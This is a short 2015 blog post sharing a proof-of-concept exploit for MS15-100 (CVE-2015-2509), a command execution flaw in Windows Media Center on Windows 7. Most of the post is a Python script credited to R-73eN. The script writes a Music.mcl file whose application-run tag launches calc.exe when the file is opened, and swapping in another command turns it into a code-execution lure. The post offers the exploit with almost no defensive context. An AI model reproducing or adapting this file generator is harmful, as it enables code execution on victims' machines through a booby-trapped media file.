Our Feeds

Saturday 12 September 2015

Ajith KP

Windows Media Center - Command Execution (MS15-100) Vulnerability

Hello GuyZ,
     The Windows 7 is under command execution vulnerability. Windows Media Center is vulnerable to command execution attack. The exploit is written by R-73eN.

Exploit Link: http://0day.today/exploit/description/24239

Before Running evil MCL file

After Running evil MCL file

Source Code


# Title: MS15-100 Windows Media Center Command Execution
# Date : 11/09/2015
# Author: R-73eN
# Software: Windows Media Center
# Tested : Windows 7 Ultimate
# CVE : 2015-2509
  
  
banner = ""
banner += " ___        __        ____                 _    _  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner
  
command = "calc.exe"
evil = '<application run="' + command + '"/>'
f = open("Music.mcl","w")
f.write(evil)
f.close()
print "\n[+] Music.mcl generated . . . [+]"